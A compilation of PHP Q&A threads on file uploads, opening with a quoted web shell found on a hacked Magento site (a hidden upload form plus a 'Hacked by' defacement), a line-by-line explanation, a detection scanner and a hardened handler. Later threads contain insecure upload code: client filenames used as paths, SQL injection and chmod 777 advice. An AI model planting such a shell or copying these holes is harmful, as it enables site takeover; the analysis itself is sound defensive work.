My Magento web site was hacked, what does this php code do? - php

I just found some php file on my hosting. With a 0.01% knowledge in php, can someone please explain to me what this code does?
<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(#copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

Code Breakdown:
if the variable in the query string has a value (ie. index.php?ourzr=set)
<?php
if(isset($_GET["ourzr"])){
Then display information about your server's operating system using the function php_uname(). They use this information to target the next round of hacks to your system specifics.
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
Create an html form that allows more hack files to be uploaded
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
If a file has been uploaded, copy the files from the temp folder to a normal folder without the temp name but the original name
if($_POST["v"]==up){
if(#copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>sucess</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>failed</b>";
}
}
}
?>
This part is just a little message saying "I'm a kool script kiddie from the gangsters crew"
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
Conclusion:
DELETE THIS FILE ASAP
This script was somehow uploaded to your server through some vulnerability that likely still exists (Unless the hacker was nice enough to fix it for you).
They found a way to get this one file on your server somewhere they can access it, now they want to use it to continue to upload scripts and other malicious data. Delete this file, and look into securing anywhere your site uploads files of any kind.
Next Steps:
Read about how hackers use file uploads to upload scripts like these, and other things they can do with their own upload form:
https://www.acunetix.com/websitesecurity/upload-forms-threat/
Read up on how to create a secure upload script: There are many other tutorials
Read more about security, and try to learn a little php. Let me know if you have any more specific questions
Hunt down this guy I guess: https://twitter.com/d3b_x
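A way to check whether other copies of this kind of uploader are sitting in the web root, as an added example that is not part of the original answer. The indicator names, the scan_webroot helper and the demo files are hypothetical and constructed for illustration; point scan_webroot() at your real document root and review every hit by hand.

```php
<?php
declare(strict_types=1);

// Indicators taken from the uploader analysed above. Each one is weak alone
// (php_uname and upload forms are legitimate); several together warrant review.
const INDICATORS = [
    'php_uname'        => '/\bphp_uname\s*\(/i',
    'upload-form'      => '/enctype\s*=\s*["\']?multipart\/form-data/i',
    'client-name-dest' => '/\b(copy|move_uploaded_file)\s*\([^;]*\$_FILES\s*\[[^\]]+\]\s*\[\s*["\']name["\']\s*\]/i',
];

/** Return [path => [indicator names]] for PHP files matching at least $min indicators. */
function scan_webroot(string $root, int $min = 2): array
{
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $f) {
        if (!$f->isFile() || !preg_match('/\.(php\d?|phtml)$/i', $f->getFilename())) {
            continue;
        }
        $src = (string) file_get_contents($f->getPathname());
        $found = [];
        foreach (INDICATORS as $name => $re) {
            if (preg_match($re, $src) === 1) {
                $found[] = $name;
            }
        }
        if (count($found) >= $min) {
            $hits[$f->getPathname()] = $found;
        }
    }
    return $hits;
}

// Constructed demo tree: one benign file and one shaped like the uploader.
$root = sys_get_temp_dir() . '/scan_demo_' . bin2hex(random_bytes(4));
mkdir($root);
file_put_contents("$root/index.php", '<?php echo "hello";');
file_put_contents("$root/x.php", '<?php echo php_uname(); '
    . 'if (copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { echo "ok"; }');
foreach (scan_webroot($root) as $path => $found) {
    echo $path, ': ', implode(', ', $found), PHP_EOL;
}
array_map('unlink', glob("$root/*.php"));
rmdir($root);
```

A match is a reason to read the file, not proof of compromise, and a clean scan does not show that the original entry point has been closed.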

Related

Basic PHP Upload Form Issue

I want my form to check if the file name equals the users name, in principle everything works fine how I tested it, but the problem I'm having is that the spell check includes the format letters of the image, thus giving a non match.
Example:
Username tries to upload a picture which is correctly named Username.png
The system would work fine, but it takes into account the .png as well, thus gives out a non match. Is there a way I could try and exclude the image format name from the if statement? Because that is pretty much the only problem I'm having with my function, I tried renaming myself to Username.png and then the form works great, but in practice nobody will use such a weird username lol. I'm sorry if my question is a bit confusing or too long, hope it is as clear as I think it is. I will include my small snippet of code here:
if ( ($_FILES["fileToUpload"]["name"]) != $ir['username'] )
{
echo "Sorry, your file is not correctly named.";
$uploadOk = 0;
}
I tried adding a .png after the $ir['username'] like so: $ir['username'].png but then the form just gives out a critical error, so I assume this is a bad spot to write it in. Is there a better way I could do this and is there a way at all? Maybe I could make the form not show up the .png for example? I'm unsure how I could handle this at this point, any input would be invaluable. Thank you for your time, have a good day!
Edit: I will include the form itself as well:
<form action='upload.php' method='post' enctype='multipart/form-data'>
Select image to upload:
<input type='file' name='fileToUpload' id='fileToUpload'><br>
<input type='submit' value='Upload Picture' name='submit'>
</form>
There are several ways of doing that.
The easiest is to split your filename on ., remove the last one and glue it again.
$filename = explode('.', $_FILES["fileToUpload"]["name"]);
array_pop($filename);
$filename = implode('.', $filename);

PHP Script is not Properly Uploading Images

I'm working on a small, user-maintained online store, and am trying to allow my end user (the store administrator) to upload graphics for products. When I run this script, however, it doesn't actually store the image. I built this script from various tips here and a tutorial, and have gotten everything but the image upload portion to work.
// Set the image target directory here
$target = "itemImages/";
$target = $target . basename($_FILES["image"]["name"]);
// Variables get POSTed here - just tack new ones on at the end.
// Various POSTs omitted for brevity
$pic=($_FILES["image"]["name"]);
// Places the picture in the folder
if(move_uploaded_file($_FILES["image"]['tmp_name'], "itemImages/"))
{
echo "The file " . basename($_FILES['uploadedfile']["name"]) . " has been uploaded.<br />";
}else {
echo "There was an issue adding this item. Please try again.<br />";
}
// Writes variables to the database
mysql_query("INSERT INTO tbl_item (itemNAME,itemDESC,itemCOST,itemHCOL,itemHSIZ,itemIMG)
VALUES ('$itemName','$itemDesc','$itemCost','$hasColor','$hasSize','$pic')");
mysql_close($con);
?>
Any help, tips, advice, insight, etc. would be very much appreciated.
move_uploaded_file requires a filename as its target. It does not blindly move to a directory, so
move_uploaded_file($_FILES..., 'somedir/somefile.txt');
works, but
move_uploaded_file($_FILES..., 'somedir/');
will not.
Plus, note that your database operation is vulnerable to SQL injection attacks. You're blindly inserting the uploaded file's remote name (['name'] via $pic), and that name is fully under the remote user's control.
Make sure the itemImages folder has write permission by the user your web server (e.g. Apache) is running as (e.g. www-data)
make sure the .php file and the folder you are writing to have the same "owner". Or try setting permissions on the itemImages folder to 777 (This is not recommended, just a debug tactic)

List of Images from Submitted Directory Name via HTML Form

I've searched SO for answers to this feature I desire, but what I need is somewhat unique?
I've got an input element, I type in the name of a sub-folder, hit submit, and a list of the image names within that specified folder is generated via PHP or other. This is local, nothing fancy.
<form action="Make_List.php" method="post">
<input type=text name="location"/>
<input type=submit/>
</form>
<div id="List_Generated"> //desired output.
<span>A.jpg</span>
<span>B.jpg</span>
<span>C.jpg</span>
<span>D.png</span>
</div>
I have no idea what to put in Make_List.php, or if it'll even work locally. I did find this online:
//path to directory to scan
$directory = "../images/team/harry/" ( + sub-folder name );
//get all image files with a .jpg extension.
$images = glob($directory . "*.jpg");
//print each file name
foreach($images as $image)
{
echo $image;
}
But Firefox doesn't know what to do, it asks me to open or save the .php file. Some similar questions on SO (the local part) imply that I don't need PHP for this?
Any tips or pointers would be helpful.
PHP needs a server environment to be processed. You can run a server locally on your own computer. Google installing apache + php. If you have hosting that supports the PHP language you can test your code there.
Your web browser does not run PHP code. An interpreter runs the scripts and there are modules to plug the PHP interpreter into an http server, i.e. Apache. Apache will then run the code and return the results if it is instructed to process the .php with a certain module through its configuration.
Use
//path to directory to scan
$directory = "full/path/to/images/team/harry/" . $_POST['location'];
foreach (glob($directory."*.jpg") as $filename) {
echo $filename;
}
Here is a better example for you to work with, no need to type a subdir:
<?php
//Get subfolder list
$folders = glob('../images/team/harry/*',GLOB_ONLYDIR);
?>
<form action="" method="post">
<select name="location" onchange="javascript:this.form.submit()">
<option>-Choose Subdir-</option>
<?php
foreach($folders as $folder){
echo '<option value="'.basename($folder).'">'.basename($folder).'</option>'.PHP_EOL;
}
?>
</select>
</form>
<?php
//List of files once post was submitted
if(isset($_POST['location'])){
echo '<div id="List_Generated">';
$files = glob('../images/team/harry/'.basename($_POST['location']).'/*.jpg');
foreach($files as $file){
echo '<span>'.basename($file).'</span>'.PHP_EOL;
}
echo '</div>';
}
?>
Yes, this sort of thing can be done but with limitations as follows:
Must use HTML5 (doctype and markup).
Google Chrome only (for now)
Application-specific "sandbox" area only, not your general file system.
Realistically, you are thus limited to your computer(s) or those in an intranet where each computer's environment is controlled; not the internet at large.
I'm not an expert but here's a good introduction. You need to read at least the Intro and the section entitled "Reading a directory's contents".

copy php no error

I have a form with the possibility to upload an image from the computer to a server, but it won't work. I don't get any error message, so that's quite annoying. (First I got permission denied, but that was solved by changing the rights), but now when I submit the form, everything goes normally, but the file isn't copied to the destination folder. (The folder exists: I tried it with file_exist()...)
Here's part of the code:
<form action='/changingfruit/index.php?item=bad' name='form' method='post' enctype='multipart/form-data'>
<tr>
<td><input type='text' name='titel_nl' value="titel nl" /><br/><input type='text' name='titel_fr' value="titel fr"/></td>
<td><input type='file' name='text_nl' id='text_nl' accept="image/*"/><br/><input type='file' name='text_fr' id="test_fr" accept="image/*"/></td>
<td class="vTop"><input type="submit" value="Bewaar"/></td>
</tr>
</form>
Part where the values are being sent to the db:
$str_titel_nl = $_POST["titel_nl"];
$str_titel_fr = $_POST["titel_fr"];
$str_text_nl = $_FILES["text_nl"]["name"];
$str_text_fr = $_FILES["text_fr"]["name"];
if(!empty($_FILES["text_nl"]["name"])){
$tmp = $_FILES['text_nl']['tmp_name'] ;
$foto = $_FILES['text_nl']['name'] ;
$copied = copy($tmp, $images_nl.$foto);
unlink($tmp);
}
(Of course the above is just a part of the code, but it's this part that won't work:)
if(!empty($_FILES["text_nl"]["name"])){
$tmp = $_FILES['text_nl']['tmp_name'] ;
$foto = $_FILES['text_nl']['name'] ;
$copied = copy($tmp, $images_nl.$foto);
unlink($tmp);
}
The code below this part also works fine, so no error, but also no image.
Does someone know where the problem could be?
Thanks so much in advance!
FOUND THE ANSWER
So it was indeed a permission problem. Everything was 777, but the last folder where the image was put had 755. (/fruits/img/2012/thumb/) the thumb was 755. I just overlooked it. Thanks everyone for the help!
Your upload code is very messy. Instead of using copy you should be using move_uploaded_file, and also validate that it actually worked and then perform whatever actions needed.
I'm also not sure why each of your lines starts with <?php and ends with ?> ?
You can write it all as one block instead, and I think it would also make more sense and would make your code cleaner for sure.
Last thing I would recommend is reading "Handling File Uploads" from the PHP Manual. It might shed some light on the problems you're having.
P.S. Try adding on top ini_set("display_errors","On"); error_reporting(E_ALL); and see if you're getting any error messages.
Please have a look at the link below.
PHP upload file to web server from form. error message
http://patelmilap.wordpress.com/2012/01/30/php-file-upload/
you can try this
$flag = @copy($temp, $move);
if ( $flag === true )
{
print "Uploaded";
}
I have posted a simple solution for file uploading without worrying about the implementation.
Click to see the thread
image uploading issue in codeigniter 2.1.0
Please read this section
In that, $uploader->getMessage(); will return an error string related to the upload failure. So you can understand why the uploading failed.
Thanks

uploading img to server using move_uploaded_file() help

So im here trying to learn more php and... trying to add an image that a user would upload(an avatar) to the server via move_uploaded_file...oh and im on WAMP right now fyi.
the book I'm reading ...long story short, the example shown doesn't work. I've Googled around and literally copy pasted a few relevant examples I've found and still....well to be clear, be it that I wrote it or from the net, I can upload the image name (along with other values) to tables on the db I have set up but the image itself doesn't move to the directory I've set up for it.
I've stripped all my apps code to a simple table and simple php to make sure nothing was conflicting etc, and still nada.
here is my html:
<form method="post" action="testUpload.php" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="32768" >
<table summary="guitarwars lesson" width="500">
<tr>
<td>load picture:</td>
<td><input type="file" name="screenshot" id="screenshot" ></td>
</tr>
<tr>
<td><input type="submit" name="submit" action="submit"></td>
</tr>
</table>
</form>
here is my php:
<?php
$screenshot = $_FILES['screenshot']['name'];
//$destination = "images/user_avatars/$screenshot";
$insertValues = "INSERT INTO testdb(screenshot) VALUES ('$screenshot')";
//---declare connection.
$connect2db = mysqli_connect('127.0.0.1','root','pass','dbname');
if(!$connect2db){
die("Sorry but theres a connection to database error" . mysqli_error);
} else {
//pg intro mssg
echo ' <span style="font-size:25px; color:green;"> --- Link Established with Database ---.<span/><br/><br/>';
}
// put into db.
if(!empty($screenshot)) {
$insertData = mysqli_query($connect2db, $insertValues);
echo 'data submitted. thank you';
move_uploaded_file ($_FILES['screenshot']['tmp_name'],"images/user_avatars/{$screenshot}");
echo 'IMAGE UPLOAD COMPLETE';
}
mysqli_close($connect2db);
?>
now i dont get an error...i actually get the echo "image upload complete" part...
and like i said, with the app code, i get multiple values AND the image name going through and being saved onto the db, but the image itself being moved from temp to my location is a no go.
any tips links, etc i gladly appreciate.
Thank you in advance.
If that's code from your book, then throw the book out and burn it as fast as you can.
a) You're wide open to SQL injection attacks. Any decent PHP tutorial that shows how to deal with databases should START with sql injection attack mitigation strategies.
b) Your connection-failed error uses mysqli_error, which is an undefined constant. You probably want mysqli_error(), which is a function call
c) The code assumes the upload completed successfully. Uploads can/will fail at the drop of a hat, so NOT checking for errors is the fast road to hair-pulling. At minimum the script should have something like
if ($_FILES['screenshot']['error'] !== UPLOAD_ERR_OK) {
die("Upload failed with error code " . $_FILES['screenshot']['error']);
}
Those error codes are defined here.
d) Your code is using the user-supplied filename to store the file onto the server. Nothing says that a malicious user can't hack the filename to include path information, so your code is actually allowing that nasty user to scribble on ANY file on your server which the webserver process has write access to. This is BAD
e) Your code also assumes the file move succeeded, without checking for errors. It should have at minimum
$status = move_uploaded_file(...);
if (!$status) {
die("Move failed!");
}
or something similar.
f) Your code assumes that all the database queries succeeded. Even if your query string is 100% perfectly formed (yours aren't, see (a) above), queries can fail for any number of other reasons. At bare minimum you should have:
$result = mysqli_query(...) or die(mysqli_error($connect2db));
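Points (a) and (c) through (f) of the answer above combined into one handler, as an added example that is not part of the original thread. It assumes the fileinfo and mysqli extensions and reuses the question's field, table and folder names; store_upload and record_upload are hypothetical helper names.

```php
<?php
declare(strict_types=1);

// Accepted types, keyed by the MIME type detected from the file content.
const ALLOWED_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
const MAX_BYTES = 32768; // same limit as MAX_FILE_SIZE in the question's form

/** Validate one $_FILES entry, store it under a server-chosen name, return that name. */
function store_upload(array $file, string $destDir): string
{
    // (c) never assume the upload itself succeeded
    $error = $file['error'] ?? null;
    if ($error !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error code ' . var_export($error, true));
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        throw new RuntimeException('File is larger than ' . MAX_BYTES . ' bytes');
    }
    // Decide the type from the content, not from the client-supplied name or type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext = is_string($mime) ? (ALLOWED_TYPES[$mime] ?? null) : null;
    if ($ext === null) {
        throw new RuntimeException('Only PNG, JPEG and GIF images are accepted');
    }
    // (d) the stored name is generated here; $file['name'] never reaches a path
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    // (e) check the move; move_uploaded_file() also rejects paths that are not uploads
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('Could not move the upload into ' . $destDir);
    }
    return $name;
}

/** (a), (f): bound parameter instead of string interpolation, and the result is checked. */
function record_upload(mysqli $db, string $storedName): void
{
    // On PHP 8.1+ mysqli throws on failure by default; the checks cover older defaults.
    $stmt = $db->prepare('INSERT INTO testdb (screenshot) VALUES (?)');
    if ($stmt === false || !$stmt->bind_param('s', $storedName) || !$stmt->execute()) {
        throw new RuntimeException('Database insert failed: ' . $db->error);
    }
}

// Call site in testUpload.php, reusing the question's field, table and folder names:
if (PHP_SAPI !== 'cli' && isset($_FILES['screenshot'])) {
    $db = mysqli_connect('127.0.0.1', 'root', 'pass', 'dbname');
    if ($db === false) { throw new RuntimeException('Database connection failed'); }
    $name = store_upload($_FILES['screenshot'], __DIR__ . '/images/user_avatars');
    record_upload($db, $name);
    echo 'Stored as ', htmlspecialchars($name);
}
```

Because the stored name carries a fixed image extension chosen by the server, an uploaded script cannot land in the folder under a .php name, and the bound parameter keeps the file name out of the SQL text.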
As a start you could add
if(!move_uploaded_file(...))
die('error');
if you replace
move_uploaded_file ($_FILES['screenshot']['tmp_name'],"images/user_avatars/{$screenshot}");
echo 'IMAGE UPLOAD COMPLETE';
with
if (move_uploaded_file ($_FILES['screenshot']['tmp_name'],"images/user_avatars/{$screenshot}")) {
echo 'IMAGE UPLOAD COMPLETE';
}
you would then get the echo if it was successful
Try to supply the absolute path:
move_uploaded_file ($_FILES['screenshot']['tmp_name'],"/path/to/images/user_avatars/{$screenshot}");
